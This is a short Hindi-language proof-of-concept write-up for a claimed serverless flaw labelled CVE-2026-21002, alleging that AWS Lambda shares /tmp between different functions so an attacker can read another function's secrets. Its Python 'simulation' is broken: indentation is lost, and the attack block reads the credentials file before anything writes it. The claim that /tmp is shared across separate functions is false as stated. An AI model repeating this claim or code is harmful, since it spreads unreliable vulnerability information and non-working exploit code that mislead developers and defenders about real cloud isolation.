
सर्वरलेस कोल्ड-स्टार्ट क्रेडेंशियल लीकेज (CVE-2026-21002) के लिए PoC एक्सप्लॉइट, जो दर्शाता है कि पुनः उपयोग की गई Lambda /tmp निर्देशिकाएँ AWS सीक्रेट्स को अन्य फ़ंक्शनों के सामने कैसे उजागर करती हैं।
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time
SECRET_FILE = '/tmp/credentials' # reused across warm starts
def handler(event):
# On first invocation, write a secret
if not os.path.exists(SECRET_FILE):
with open(SECRET_FILE, 'w') as f:
f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
return "Initialized"
# Later invocations can read it
with open(SECRET_FILE) as f:
return f.read()
# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
print("Attacker reads:", f.read())
सर्वरलेस प्लेटफ़ॉर्म फ़ंक्शन इनवोकेशन के दौरान और यहां तक कि एक ही खाते के विभिन्न फ़ंक्शनों के बीच निष्पादन वातावरण (जिसमें /tmp भी शामिल है) का पुनः उपयोग करते हैं। कोल्ड स्टार्ट के बाद, एक हमलावर का फ़ंक्शन किसी अन्य फ़ंक्शन द्वारा /tmp में छोड़ी गई संवेदनशील फ़ाइलों को पढ़ सकता है, जिससे क्रेडेंशियल की चोरी होती है।
/tmp निर्देशिका फ़ंक्शनों के बीच अलगाव के बिना वार्म कंटेनरों के बीच साझा की जाती है।सिमुलेशन चलाएँ:
python lambda_func_sim.py
हमलावर पीड़ित फ़ंक्शन द्वारा छोड़ा गया AWS_SECRET_ACCESS_KEY पढ़ता है।